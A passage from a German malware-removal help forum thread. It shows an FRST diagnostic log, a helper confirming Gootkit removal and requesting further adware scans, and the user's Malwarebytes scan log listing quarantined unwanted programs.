2019-02-20 19:01 - 2019-02-20 19:01 - 001123840 _____ () [Datei ist nicht signiert] C:\Program Files\WindowsApps\AudibleInc.AudibleforWindowsPhone_10.5.66.0_x64__xns73kv1ymhp2\e_sqlite3.dll
2017-12-10 20:25 - 2011-08-23 13:04 - 000057344 _____ () [Datei ist nicht signiert] d:\WinTV8\TVServer\libhdhomerun.dll
2017-12-10 20:25 - 2015-11-24 20:59 - 000134656 _____ (Hauppauge Computer Works) [Datei ist nicht signiert] D:\WinTV8\WinTV8\hcwtsfilter.ax
2017-12-10 20:25 - 2015-11-24 20:59 - 000113152 _____ (Hauppauge Computer Works) [Datei ist nicht signiert] D:\WinTV8\WinTV8\HCWTSWriter.ax
2017-12-10 20:25 - 2016-04-26 12:29 - 000332288 _____ (Hauppauge Computer Works, Inc.) [Datei ist nicht signiert] D:\WinTV8\WinTV8\PsiParser.ax
2019-06-17 20:35 - 2011-11-22 13:22 - 000143360 _____ (Holtek) [Datei ist nicht signiert] C:\Program Files (x86)\Drakonia Configurator\HIDApi.dll
2019-08-31 09:32 - 2020-06-24 09:32 - 001282048 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\LIBEAY32.dll
2019-08-31 09:32 - 2020-06-24 09:32 - 000279040 _____ (The OpenSSL Project, hxxp://www.openssl.org/) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\ssleay32.dll
2020-03-24 07:35 - 2020-06-24 09:32 - 001611264 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\platforms\qwindows.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 005487104 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Core.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 005841920 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Gui.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 001179136 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Network.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 000146432 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5WebSockets.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 005089792 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Widgets.dll
2020-12-02 20:07 - 2020-06-24 09:32 - 000184832 _____ (The Qt Company Ltd) [Datei ist nicht signiert] C:\Program Files (x86)\Origin\Qt5Xml.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\Users\Public\AppData:CSM [468]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [482]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) =================

==================== Internet Explorer (Nicht auf der Ausnahmeliste) ==========

BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2020-09-18] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre-10.0.2\bin\ssv.dll => Keine Datei
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre-10.0.2\bin\jp2ssv.dll [2020-06-27] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\Office16\OCHelper.dll [2020-09-18] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> D:\Java\2_51\bin\ssv.dll [2020-05-01] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> D:\Java\2_51\bin\jp2ssv.dll [2020-05-01] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM-x32 - StExBar - {367D8B32-F9FD-474b-8E65-9E521F35DE99} - C:\Program Files (x86)\StExBar\StExBar.dll [2019-05-25] (Open Source Developer, Stefan KUENG -> hxxp://tools.stefankueng.com)
Handler-x32: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - C:\Program Files (x86)\Common Files\Microsoft Shared\Information Retrieval\MSITSS.DLL [2000-04-19] (Microsoft Corporation) [Datei ist nicht signiert]
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-10-30] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-10-30] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-10-30] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2020-10-30] (Microsoft Corporation -> Microsoft Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts Inhalt: =========================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2017-09-29 14:46 - 2020-12-02 22:43 - 000000027 _____ C:\WINDOWS\system32\drivers\etc\hosts
127.0.0.1      localhost

==================== Andere Bereiche ===========================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Program Files (x86)\Razer\ChromaBroadcast\bin;C:\Program Files\Razer\ChromaBroadcast\bin;C:\ProgramData\Oracle\Java\javapath;C:\Program Files (x86)\Business Objects\Common\3.5\bin\NOTES\;C:\Program Files (x86)\Business Objects\Common\3.5\bin\NOTES\DATA\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Calibre2\;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files\Microsoft SQL Server\120\Tools\Binn\;C:\WINDOWS\system32\config\systemprofile\AppData\Local\Microsoft\WindowsApps;C:\Users\Tom_Admin\AppData\Local\Microsoft\WindowsApps;;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img3.jpg
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )
 ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

HKLM\...\StartupApproved\StartupFolder: => "AutoStart IR.lnk"
HKLM\...\StartupApproved\StartupFolder: => "WinTV Recording Status.lnk"
HKLM\...\StartupApproved\Run: => "Wondershare Helper Compact.exe"
HKLM\...\StartupApproved\Run32: => "Updater"
HKLM\...\StartupApproved\Run32: => "RazerCortex"
HKLM\...\StartupApproved\Run32: => "Razer Synapse"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\StartupApproved\StartupFolder: => "Mounten.bat"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Wiederherstellungspunkte =========================

25-11-2020 11:07:47 Geplanter Prüfpunkt
28-11-2020 13:26:43 DirectX wurde installiert

==================== Fehlerhafte Geräte im Gerätemanager ============

Name: HP EWS
Description: HP EWS
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: HP FAX
Description: HP FAX
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Fehlereinträge in der Ereignisanzeige: ========================

Applikationsfehler:
==================
Error: (12/02/2020 10:08:27 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Fehler in Manifest- oder Richtliniendatei "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" in Zeile  1.
Die im Manifest gefundene Komponenten-ID stimmt nicht mit der ID der angeforderten Komponente überein.
Verweis: UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition: UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Verwenden Sie das Programm "sxstrace.exe" für eine detaillierte Diagnose.

Error: (12/02/2020 02:41:01 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Fehler in Manifest- oder Richtliniendatei "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" in Zeile  1.
Die im Manifest gefundene Komponenten-ID stimmt nicht mit der ID der angeforderten Komponente überein.
Verweis: UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition: UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Verwenden Sie das Programm "sxstrace.exe" für eine detaillierte Diagnose.

Error: (12/02/2020 02:40:55 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Fehler beim Generieren des Aktivierungskontextes für "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest". Fehler in Manifest- oder Richtliniendatei "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" in Zeile  1.
Die im Manifest gefundene Komponenten-ID stimmt nicht mit der ID der angeforderten Komponente überein.
Verweis: UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition: UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Verwenden Sie das Programm "sxstrace.exe" für eine detaillierte Diagnose.

Error: (12/02/2020 11:28:07 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Volume (I:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (12/02/2020 11:28:02 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Zwi_Lager (H:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (12/02/2020 11:27:47 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Daten (G:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (12/02/2020 11:27:46 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Medien (F:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)

Error: (12/02/2020 11:27:42 AM) (Source: Microsoft-Windows-Defrag) (EventID: 264) (User: )
Description: Die Speicheroptimierung konnte erneut optimieren auf Spiele (E:) nicht abschließen. Grund: Der angeforderte Vorgang wird von der Hardware des Volumes nicht unterstützt. (0x8900002A)


Systemfehler:
=============
Error: (12/02/2020 10:43:29 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Plex Update Service" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 10000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (12/02/2020 10:43:29 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "UsbClientService" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 200 Millisekunden durchgeführt: Neustart des Diensts.

Error: (12/02/2020 10:43:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Intel(R) Dynamic Application Loader Host Interface Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (12/02/2020 10:43:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Wondershare Driver Install Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (12/02/2020 10:43:29 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Search" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts.

Error: (12/02/2020 10:43:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Wondershare Application Update Service 3.0" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (12/02/2020 10:43:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "TVG OnlineUpdate-Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (12/02/2020 10:43:29 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "HauppaugeTVServer" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 5000 Millisekunden durchgeführt: Neustart des Diensts.


Windows Defender:
===================================
Date: 2020-12-02 22:27:02.4060000Z
Description:
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Prifou&threatid=224074&enterprise=0
Name: BrowserModifier:Win32/Prifou
ID: 224074
Schweregrad: Hoch
Kategorie: Browserveränderer
Pfad: file:_C:\Users\Vincent\AppData\Roaming\Ranederapec.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: System
Benutzer: NT-AUTORITÄT\SYSTEM
Prozessname: Unknown
Sicherheitsversion: AV: 1.327.1933.0, AS: 1.327.1933.0, NIS: 1.327.1933.0
Modulversion: AM: 1.1.17600.5, NIS: 1.1.17600.5

Date: 2020-12-02 22:25:29.9320000Z
Description:
Microsoft Defender Antivirus hat Schadsoftware oder andere potenziell unerwünschte Software erkannt.
Weitere Informationen:
https://go.microsoft.com/fwlink/?linkid=37020&name=BrowserModifier:Win32/Prifou&threatid=224074&enterprise=0
Name: BrowserModifier:Win32/Prifou
ID: 224074
Schweregrad: Hoch
Kategorie: Browserveränderer
Pfad: file:_C:\Users\Vincent\AppData\Roaming\Ranederapec.exe
Erkennungsursprung: Lokaler Computer
Erkennungstype: Konkret
Erkennungsquelle: Echtzeitschutz
Benutzer: DESKTOP-HRMFF6U\Tom
Prozessname: C:\Users\Tom\Desktop\FRST64.exe
Sicherheitsversion: AV: 1.327.1933.0, AS: 1.327.1933.0, NIS: 1.327.1933.0
Modulversion: AM: 1.1.17600.5, NIS: 1.1.17600.5

Date: 2020-12-02 11:17:15.2310000Z
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {37BBC7C9-ECE9-436C-9C2F-12E32BAFC0D6}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2020-12-01 11:17:56.7110000Z
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {3B9EFD20-3A12-4BA9-B5A1-D926A6AD922F}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

Date: 2020-11-30 11:41:00.5290000Z
Description:
Die Microsoft Defender Antivirus-Überprüfung wurde vor ihrem Abschluss beendet.
Überprüfungs-ID: {88EDB4DB-6C6F-43CF-BCA4-B1F8BF02AFE5}
Überprüfungstyp: Antimalware
Überprüfungsparameter: Schnellüberprüfung
Benutzer: NT-AUTORITÄT\SYSTEM

CodeIntegrity:
===================================

Date: 2020-12-02 21:32:54.5040000Z
Description:
Windows blocked file \Device\HarddiskVolume11\Windows\System32\scrobj.dll which has been disallowed for protected processes.

Date: 2020-12-02 21:32:39.1240000Z
Description:
Windows blocked file \Device\HarddiskVolume11\Windows\System32\scrobj.dll which has been disallowed for protected processes.

Date: 2020-12-02 21:32:39.0420000Z
Description:
Windows blocked file \Device\HarddiskVolume11\Windows\System32\scrobj.dll which has been disallowed for protected processes.

==================== Speicherinformationen ===========================

BIOS: American Megatrends Inc. 0317 10/20/2016
Hauptplatine: ASUSTeK COMPUTER INC. PRIME H270-PRO
Prozessor: Intel(R) Core(TM) i5-7600 CPU @ 3.50GHz
Prozentuale Nutzung des RAM: 26%
Installierter physikalischer RAM: 16318.9 MB
Verfügbarer physikalischer RAM: 12042.14 MB
Summe virtueller Speicher: 18750.9 MB
Verfügbarer virtueller Speicher: 13210.25 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:232.29 GB) (Free:91.94 GB) NTFS
Drive d: (Programme) (Fixed) (Total:196.74 GB) (Free:83.74 GB) NTFS
Drive e: (Spiele) (Fixed) (Total:390.62 GB) (Free:92.32 GB) NTFS
Drive f: (Medien) (Fixed) (Total:1230.47 GB) (Free:105.66 GB) NTFS
Drive g: (Daten) (Fixed) (Total:195.31 GB) (Free:172.94 GB) NTFS
Drive h: (Zwi_Lager) (Fixed) (Total:390.62 GB) (Free:145.75 GB) NTFS
Drive i: (Volume) (Fixed) (Total:390.62 GB) (Free:59.39 GB) NTFS

\\?\Volume{79857743-b9df-46b3-96bf-e4e8d9a3cd63}\ () (Fixed) (Total:0.49 GB) (Free:0.04 GB) NTFS
\\?\Volume{71e4b085-1259-4f2a-94a3-b1ef97ec4058}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partitionstabelle ====================

==========================================================
Disk: 0 (Protective MBR) (Size: 2794.5 GB) (Disk ID: 00000000)

Partition: GPT.

==========================================================
Disk: 1 (Protective MBR) (Size: 232.9 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt =======================

M-K-D-B 03.12.2020 14:56
Gootkit ist weg. :daumenhoc
Jetzt kümmern wir uns noch um die PUP / Adware, die auf dem Rechner ist.




Schritt 1
Führe Malwarebytes' AntiMalware (MBAM) gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei.





Schritt 2
Führe AdwCleaner gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei.





Schritt 3
Führe RogueKiller Anti-Malware gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei.






Bitte poste mit deiner nächsten Antwort:
  • die Logdatei von MBAM
  • die Logdatei von AdwCleaner
  • die Logdatei von RogueKiller

Rupsi 03.12.2020 16:55
Guten Tag Matthias,

Code:
Malwarebytes
www.malwarebytes.com

-Protokolldetails-
Scan-Datum: 03.12.20
Scan-Zeit: 16:26
Protokolldatei: e5acffb6-357b-11eb-b3ec-704d7b85adae.json

-Softwaredaten-
Version: 4.2.3.96
Komponentenversion: 1.0.1122
Version des Aktualisierungspakets: 1.0.33814
Lizenz: Testversion

-Systemdaten-
Betriebssystem: Windows 10 (Build 19041.630)
CPU: x64
Dateisystem: NTFS
Benutzer: DESKTOP-HRMFF6U\Tom

-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Scan gestartet von: Manuell
Ergebnis: Abgeschlossen
Gescannte Objekte: 402524
Erkannte Bedrohungen: 29
In die Quarantäne verschobene Bedrohungen: 29
Abgelaufene Zeit: 3 Min., 18 Sek.

-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Aktiviert
Heuristik: Aktiviert
PUP: Erkennung
PUM: Erkennung

-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)

Modul: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 13
PUP.Optional.StartFenster, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Startfenster-Replace.de, In Quarantäne, 494, 350112, , , , , ,
PUP.Optional.WebDiscoverBrowser, HKU\S-1-5-21-3451750051-380284315-2914928687-1003\SOFTWARE\WebDiscoverBrowser, In Quarantäne, 1741, 253912, 1.0.33814, , ame, , ,
PUP.Optional.SearchManager, HKU\S-1-5-21-3451750051-380284315-2914928687-1003\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\icmgebopaejnjlncllgmcenbbflikfjd, In Quarantäne, 441, 521971, 1.0.33814, , ame, , ,
Adware.KeenValue, HKLM\SOFTWARE\WOW6432NODE\Updater, In Quarantäne, 6953, 212959, 1.0.33814, , ame, , ,
PUP.Optional.StartFenster.ShrtCln, HKU\S-1-5-21-3451750051-380284315-2914928687-1001\SOFTWARE\AM, In Quarantäne, 3395, 401432, 1.0.33814, , ame, , ,
PUP.Optional.eSupportUndeletePlus, HKU\S-1-5-21-3451750051-380284315-2914928687-1001\SOFTWARE\ESUPPORT.COM\UndeletePlus, In Quarantäne, 3035, 355410, 1.0.33814, , ame, , ,
PUP.Optional.Conduit, HKU\S-1-5-21-3451750051-380284315-2914928687-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, In Quarantäne, 193, 236865, , , , , ,
PUP.Optional.Conduit, HKU\S-1-5-21-3451750051-380284315-2914928687-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, In Quarantäne, 193, 236865, , , , , ,
PUP.Optional.Conduit, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, In Quarantäne, 193, 236865, , , , , ,
PUP.Optional.Conduit, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, In Quarantäne, 193, 236865, , , , , ,
PUP.Optional.Conduit, HKU\S-1-5-21-3451750051-380284315-2914928687-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}, In Quarantäne, 193, 236865, 1.0.33814, , ame, , ,
PUP.Optional.StartFenster, HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\Startfenster-Replace.exe, In Quarantäne, 494, 350115, 1.0.33814, , ame, , ,
PUP.Optional.StartFenster, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\Startfenster-Replace.exe, In Quarantäne, 494, 350115, 1.0.33814, , ame, , ,

Registrierungswert: 4
PUP.Optional.WinYahoo, HKU\S-1-5-21-3451750051-380284315-2914928687-1003\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|START PAGE, In Quarantäne, 240, 311488, 1.0.33814, , ame, , ,
PUP.Optional.StartFenster.ShrtCln, HKU\S-1-5-21-3451750051-380284315-2914928687-1001\SOFTWARE\AM|STARTFENSTER-REPLACE, In Quarantäne, 3395, 401432, 1.0.33814, , ame, , ,
PUP.Optional.Conduit, HKU\S-1-5-21-3451750051-380284315-2914928687-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, In Quarantäne, 193, 236865, 1.0.33814, , ame, , ,
PUP.Optional.Conduit, HKU\S-1-5-21-3451750051-380284315-2914928687-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|TOPRESULTURL, In Quarantäne, 193, 236865, 1.0.33814, , ame, , ,

Registrierungsdaten: 1
PUP.Optional.Conduit, HKU\S-1-5-21-3451750051-380284315-2914928687-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|START PAGE, Ersetzt, 193, 293058, 1.0.33814, , ame, , ,

Daten-Stream: 0
(keine bösartigen Elemente erkannt)

Ordner: 3
PUP.Optional.StartFenster, C:\PROGRAM FILES (X86)\STARTFENSTER-REPLACE, In Quarantäne, 494, 350112, 1.0.33814, , ame, , ,
PUP.Optional.StartFenster.ShrtCln, C:\USERS\TOM_ADMIN\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTFENSTER-REPLACE, In Quarantäne, 3395, 401566, 1.0.33814, , ame, , ,
PUP.Optional.Spigot.Generic, C:\USERS\TOM\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\4EKS1494.DEFAULT\BROWSER-EXTENSION-DATA\web@fd9b3d8a-1178-45ab-92a8-a172d0b7c32e, In Quarantäne, 199, 662625, 1.0.33814, , ame, , ,

Datei: 8
PUP.Optional.StartFenster, C:\PROGRAM FILES (X86)\STARTFENSTER-REPLACE\LOGO.ICO, In Quarantäne, 494, 350112, 1.0.33814, , ame, , BDCF63C89B22A44CDF5B1BE184714A26, C333C15AC24C7820F8E613E6878F1823514E15618CBBFE16161405CDE5270A39
PUP.Optional.StartFenster, C:\Program Files (x86)\Startfenster-Replace\uninstall.exe, In Quarantäne, 494, 350112, , , , , 56F998A44AAE1BF48DB4CE759517E31B, BC8DE31C4DE56F0421100BB5AC080F8A40CD47E7849723583D30378653327818
PUP.Optional.SearchManager, C:\USERS\VINCENT\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\NIU7SHOJ.DEFAULT\EXTENSIONS\{24436206-088D-4A1A-8D0E-CF93CA7A2D23}.XPI, In Quarantäne, 441, 733885, 1.0.33814, , ame, , E9BCE1FC758D9AFCFA92592D427312DA, 8A09ACBCD0CC91A846AB8E2513AF8C160D4F7C6B342B60121EB20628A1328B18
PUP.Optional.Spigot.Generic, C:\USERS\TOM\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\4EKS1494.DEFAULT\EXTENSIONS\web@fd9b3d8a-1178-45ab-92a8-a172d0b7c32e.xpi, In Quarantäne, 199, 662624, 1.0.33814, , ame, , A9B894B4D518452B7522FCBA4CEF0673, 90AE7D0A96109274FA54EE0E53D47442DCA5F08674633960A4A299ABDB075911
PUP.Optional.StartFenster.ShrtCln, C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startfenster-Replace\Software deinstallieren.lnk, In Quarantäne, 3395, 401566, , , , , 0A944014F0EBD04BC6386FF32E5DE927, 3FC9D0B6D7B7AAF7FDCC87450F1C58FA350741DCB74212A1F4EC58AD89423C36
PUP.Optional.StartFenster.ShrtCln, C:\Users\Tom_Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startfenster-Replace\Startfenster.lnk, In Quarantäne, 3395, 401566, , , , , 1F0FFCD941BEC47D7D9186C34F6C97B4, 116B1FDBB69A3731B244036A455D252140D75F4C09D1BA9F74AA404EBEB1F1D0
PUP.Optional.Spigot.Generic, C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\browser-extension-data\web@fd9b3d8a-1178-45ab-92a8-a172d0b7c32e\storage.js, In Quarantäne, 199, 662625, , , , , E9C7F12032B73FEE5DAC2E520D9AC60A, 21D271A57088C03F4C55ADB8FD086CB34B06BD2008F1F2C05738963A29A74CCD
